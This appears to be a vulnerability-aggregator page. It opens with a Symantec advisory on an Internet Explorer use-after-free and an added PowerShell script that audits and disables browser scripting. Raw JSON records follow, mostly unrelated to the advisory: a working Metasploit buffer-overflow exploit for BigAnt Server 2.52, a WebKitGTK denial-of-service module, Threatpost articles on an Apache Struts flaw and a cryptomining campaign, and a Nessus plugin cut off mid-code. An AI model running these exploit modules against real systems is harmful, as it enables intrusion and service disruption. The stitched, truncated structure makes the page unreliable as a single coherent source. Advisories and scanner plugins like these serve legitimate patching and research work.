Microsoft Internet Explorer Select HTML Element Use-After-Free Memory Corruption Vulnerability
Published: 2010-12-14
ID: SMNTC-45260 | Type: symantec | Reporter: Symantec Security Response | Modified: 2010-12-14
Description
Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability, a use-after-free in its handling of the select HTML element. A successful exploit lets an attacker run arbitrary code in the context of the user running the application; a failed attempt results in a denial-of-service condition.
Technologies Affected
Avaya Aura Conferencing 6.0 Standard
Avaya CallPilot 4.0
Avaya CallPilot 5.0
Avaya CallPilot
Avaya Communication Server 1000 Telephony Manager 3.0
Avaya Communication Server 1000 Telephony Manager 4.0
Avaya Communication Server 1000 Telephony Manager
Avaya Meeting Exchange - Client Registration Server
Avaya Meeting Exchange - Recording Server
Avaya Meeting Exchange - Streaming Server
Avaya Meeting Exchange - Web Conferencing Server
Avaya Meeting Exchange - Webportal
Avaya Meeting Exchange 5.0
Avaya Meeting Exchange 5.0 SP1
Avaya Meeting Exchange 5.0.0.0.52
Avaya Meeting Exchange 5.1
Avaya Meeting Exchange 5.1 SP1
Avaya Meeting Exchange 5.2
Avaya Meeting Exchange 5.2 SP1
Avaya Meeting Exchange 5.2 SP2
Avaya Messaging Application Server 4
Avaya Messaging Application Server 5.2
Microsoft Internet Explorer 8
Recommendations
Run all software as a nonprivileged user with minimal access rights.
To reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.
Deploy network intrusion detection systems to monitor network traffic for malicious activity.
Deploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.
Do not accept or execute files from untrusted or unknown sources.
Exercise caution when handling files received from unfamiliar or suspicious sources.
Do not follow links provided by unknown or untrusted sources.
Web users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.
Set web browser security to disable the execution of script code or active content.
Since a successful exploit of this issue requires malicious code to execute in the web client, consider disabling support for script code and active content within the client browser. Note that this mitigation might adversely affect legitimate websites that rely on the execution of browser-based script code.
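The advisory recommends disabling script execution in the browser but does not say how to check or apply it. The following PowerShell script is an added example, not part of the Symantec advisory: it audits the Internet Explorer "Active scripting" setting for the Internet zone in both the per-user and machine hives and, with -Remediate, disables it for the current user. It assumes the standard IE zone registry layout (Zones\3 is the Internet zone, value 1400 is Active scripting, 0 = Enable, 1 = Prompt, 3 = Disable); those names are not on the page.

```powershell
<#
Added example, not from the Symantec advisory.
Audit (and optionally apply) the IE Internet-zone "Active scripting" setting.

Assumptions about the standard IE zone registry layout (not stated on the page):
  - Zone settings live under ...\Internet Settings\Zones\<zone>; zone 3 = Internet.
  - Value name 1400 = "Active scripting"; 0 = Enable, 1 = Prompt, 3 = Disable.
  - HKLM overrides HKCU only when Security_HKLM_only is set; this script reports
    both hives and writes only to HKCU so it runs without elevation.
#>
param(
    [switch]$Remediate   # set Active scripting to 3 (Disable) for the current user
)

$zonePath  = 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3'
$valueName = '1400'
$meaning   = @{ 0 = 'Enabled'; 1 = 'Prompt'; 3 = 'Disabled' }

function Get-ActiveScriptingSetting {
    param([string]$Hive)   # 'HKCU' or 'HKLM'
    $key = "${Hive}:\$zonePath"
    if (-not (Test-Path $key)) { return $null }
    $item = Get-ItemProperty -Path $key -Name $valueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }   # value absent: zone default applies
    return [int]$item.$valueName
}

foreach ($hive in 'HKCU', 'HKLM') {
    $v = Get-ActiveScriptingSetting -Hive $hive
    if ($null -eq $v) {
        Write-Output "$hive : Active scripting (1400) not set explicitly; the zone default applies"
    } else {
        $label = if ($meaning.ContainsKey($v)) { $meaning[$v] } else { "unknown ($v)" }
        Write-Output "$hive : Active scripting (1400) = $v ($label)"
    }
}

if ($Remediate) {
    $key = "HKCU:\$zonePath"
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name $valueName -Value 3 -Type DWord
    Write-Output "HKCU : Active scripting set to 3 (Disabled). Sites that need script will stop working; re-enable it or move them to the Trusted sites zone."
}
```

Run it without switches to see the current state on each hive; a value of 3 in either hive means the mitigation the advisory describes is in place for the Internet zone. Because the script only touches HKCU, a machine-wide policy set under HKLM (or by Group Policy) is reported but never changed.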
Implement multiple redundant layers of security.
Various memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.
The vendor has released an advisory and updates. Please see the references for details.
Record metadata (from the aggregator entry for this advisory)
Source: https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/45260 (earlier URL: https://www.symantec.com/security_response/vulnerability.jsp?bid=45260)
Record ID: SMNTC-45260 | Type: symantec | Bulletin family: software | Reporter: Symantec Security Response
Published / modified: 2010-12-14 | Last seen by aggregator: 2018-03-12 (edition 2; edition 1 seen 2016-09-04)
CVSS: none recorded (score 0.0) | Aggregator score: 1.1 (edition 1 was scored 7.6)
CVE list: none
Related entries: Threatpost THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717 and THREATPOST:D5150098043DAE7CDF2E31618C33F5D2; Nessus plugin SMB_NT_MS10-090.NASL
"exploit", "description": "This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it could lead to application crash, resulting in denial of service.\n", "modified": "2018-06-14T05:55:00", "published": "2018-06-09T06:13:47", "id": "MSF:AUXILIARY/DOS/HTTP/WEBKITPLUS", "href": "", "type": "metasploit", "title": "WebKitGTK+ WebKitFaviconDatabase DoS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => \"WebKitGTK+ WebKitFaviconDatabase DoS\",\n 'Description' => %q(\n This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\n If successful, it could lead to application crash, resulting in denial of service.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Dhiraj Mishra', # Original discovery, disclosure\n 'Hardik Mehta', # Original discovery, disclosure\n 'Zubin Devnani', # Original discovery, disclosure\n 'Manuel Caballero' #JS Code\n ],\n 'References' => [\n ['EDB', '44842'],\n ['CVE', '2018-11646'],\n ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],\n ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']\n ],\n 'DisclosureDate' => 'Jun 03 2018',\n 'Actions' => [[ 'WebServer' ]],\n 'PassiveActions' => [ 'WebServer' ],\n 'DefaultAction' => 'WebServer'\n )\n )\n end\n\n def run\n exploit # start http server\n end\n\n def setup\n @html = <<-JS\n<script type=\"text/javascript\">\n win = window.open(\"WIN\", \"WIN\");\n window.open(\"http://example.com/\", \"WIN\");\n win.document.execCommand('stop');\n win.document.write(\"HelloWorld\");\n win.document.close();\n</script>\n JS\n end\n\n def on_request_uri(cli, _request)\n print_status('Sending response')\n send_response(cli, 
@html)\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/webkitplus.rb"}, {"lastseen": "2019-11-29T11:12:35", "bulletinFamily": "exploit", "description": "This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.52. NOTE: The AntServer service does not restart, you only get one shot.\n", "modified": "2018-07-12T22:34:52", "published": "2010-01-05T08:24:35", "id": "MSF:EXPLOIT/WINDOWS/MISC/BIGANT_SERVER_USV", "href": "", "type": "metasploit", "title": "BigAnt Server 2.52 USV Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BigAnt Server 2.52 USV Buffer Overflow',\n 'Description' => %q{\n This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. 
This module was tested\n successfully against version 2.52.\n\n NOTE: The AntServer service does not restart, you only get one shot.\n },\n 'Author' \t =>\n [\n 'Lincoln',\n 'DouBle_Zer0',\n 'jduck'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-4660' ],\n [ 'OSVDB', '61386' ],\n [ 'EDB', '10765' ],\n [ 'EDB', '10973' ]\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => (218+709+35),\n 'BadChars' => \"\\x2a\\x20\\x27\\x0a\\x0f\",\n # pre-xor with 0x2a:\n #'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x25\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'BigAnt 2.52 Universal', { 'Ret' => 0x1b019fd6 } ], # Tested OK (jduck) p/p/r msjet40.dll xpsp3\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 29 2009'))\n\n register_options([Opt::RPORT(6660)])\n end\n\n def exploit\n connect\n\n sploit = \"\"\n sploit << payload.encoded\n sploit << generate_seh_record(target.ret)\n sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + payload_space.to_s).encode_string\n sploit << rand_text_alphanumeric(3)\n sploit << [0xdeadbeef].pack('V') * 3\n\n # the buffer gets xor'd with 0x2a !\n sploit = sploit.unpack(\"C*\").map{|c| c ^ 0x2a}.pack(\"C*\")\n\n print_status(\"Trying target #{target.name}...\")\n sock.put(\"USV \" + sploit + \"\\r\\n\\r\\n\")\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/bigant_server_usv.rb"}], "threatpost": [{"lastseen": "2019-07-03T05:58:59", "bulletinFamily": "info", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. 
It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. 
Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. 
In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX is also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. 
Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. 
\u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "modified": "2018-09-05T17:48:03", "published": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-28T05:48:46", "bulletinFamily": "info", "description": "A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers \u2013 who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.\n\nA [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.\n\nThe vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. 
They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team\u2019s Man Yue Mo, who uncovered the flaw.\n\n\u201cThis vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\u201d he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday. \u201cOn top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.\u201d\n\n[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts\u2019 behavior.\n\n\u201cOn the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,\u201d said Yue Mo, referring to the infamous vulnerability (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).\n\nTim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.\n\n\u201cIn the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,\u201d he explained. \u201cThe prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. 
CVE-2018-11776 operates at a far deeper level within the code, which in turn requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern \u2013 and this concern relates to any library framework.\u201d\n\n## Anatomy of the Flaw\n\nThe vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team\u2019s findings.\n\n\u201cAttackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,\u201d they explained. \u201cThe value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.\u201d\n\nBecause the issue affects the core of Struts, there are at least two separate attack vectors \u2013 and potentially many more.\n\nIn the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.\n\nThe researchers explained: \u201cAn example of a struts.xml configuration that is potentially vulnerable: the <action \u2026> tag does not have a namespace attribute and contains a result of type redirectAction. 
If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.\u201d\n\nThe second attack vector has to do with the fact that Struts supports page templates inside <result> tags in the Struts configuration: \u201cThe use of URL tags in such pages is potentially unsafe if the template is referred to from an <action> tag that does not provide a namespace attribute (or specifies a wildcard namespace),\u201d the researchers said. \u201cYour application is vulnerable if the template contains an <s:url \u2026> tag without an action or value attribute.\u201d\n\nResearchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to \u201ctrue\u201d in the Struts configuration \u2013 a default state if the application uses the popular Struts Convention plugin. Also, the application\u2019s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. \u201c/*\u201d).\n\n\u201cThis applies to actions and namespaces specified in the Struts configuration file (e.g. <action namespace=\u201dmain\u201d>), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,\u201d they explained.\n\nThat said, they also cautioned that other attack vectors may emerge that apply to different configurations.\n\n\u201cWhether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,\u201d the firm said. \u201cNote that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.\u201d\n\nThis is a critical point, according to Mackey. 
\u201cValidating the input to a function requires a clear definition of what is acceptable,\u201d he said. \u201cIt equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it\u2019s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued as it\u2019s unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.\u201d\n\nPavel Avgustinov, vice president of QL Engineering at Semmle, laid out what\u2019s at stake in a media statement: \u201cCritical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\u201d he said. \u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. 
It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\u201d\n", "modified": "2018-08-23T16:46:57", "published": "2018-08-23T16:46:57", "id": "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "href": "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/", "type": "threatpost", "title": "Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-03T12:15:45", "bulletinFamily": "scanner", "description": "The remote host is missing Internet Explorer (IE) Security Update\n2416400.\n\nThe remote version of IE is affected by several vulnerabilities that\nmay allow an attacker to execute arbitrary code on the remote host.", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS10-090.NASL", "href": "https://www.tenable.com/plugins/nessus/51162", "published": "2010-12-15T00:00:00", "title": "MS10-090: Cumulative Security Update for Internet Explorer (2416400)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(51162);\n script_version(\"1.29\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\n \"CVE-2010-3340\",\n \"CVE-2010-3342\",\n \"CVE-2010-3343\",\n \"CVE-2010-3345\",\n \"CVE-2010-3346\",\n \"CVE-2010-3348\",\n \"CVE-2010-3962\"\n );\n script_bugtraq_id(\n 44536,\n 45255,\n 45256,\n 45259,\n 45260,\n 45261,\n 45263\n );\n script_xref(name:\"CERT\", value:\"899748\");\n script_xref(name:\"EDB-ID\", value:\"15421\");\n script_xref(name:\"EDB-ID\", value:\"15418\");\n script_xref(name:\"MSFT\", value:\"MS10-090\");\n script_xref(name:\"MSKB\", value:\"2416400\");\n\n script_name(english:\"MS10-090: Cumulative Security Update for Internet Explorer (2416400)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(\n 
attribute:\"synopsis\",\n value:\n\"Arbitrary code can be executed on the remote host through a web\nbrowser.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2416400.\n\nThe remote version of IE is affected by several vulnerabilities that\nmay allow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-090\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\nand 2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-13-157\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/15\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-090';\nkbs = make_list(\"2416400\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'1,2', win7:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nkb = \"2416400\";\nif (\n # Windows 7 and Windows Server 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"8.0.7600.20831\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"8.0.7600.16700\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / Windows 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", 
file:\"Mshtml.dll\", version:\"8.0.6001.23091\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", file:\"Mshtml.dll\", version:\"8.0.6001.18999\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22511\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18332\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Mshtml.dll\", version:\"7.0.6001.22784\", min_version:\"7.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Mshtml.dll\", version:\"7.0.6001.18542\", min_version:\"7.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.18999\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17093\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.4795\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.18999\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17093\", min_version:\"7.0.0.0\", dir:\"\\system32\", 
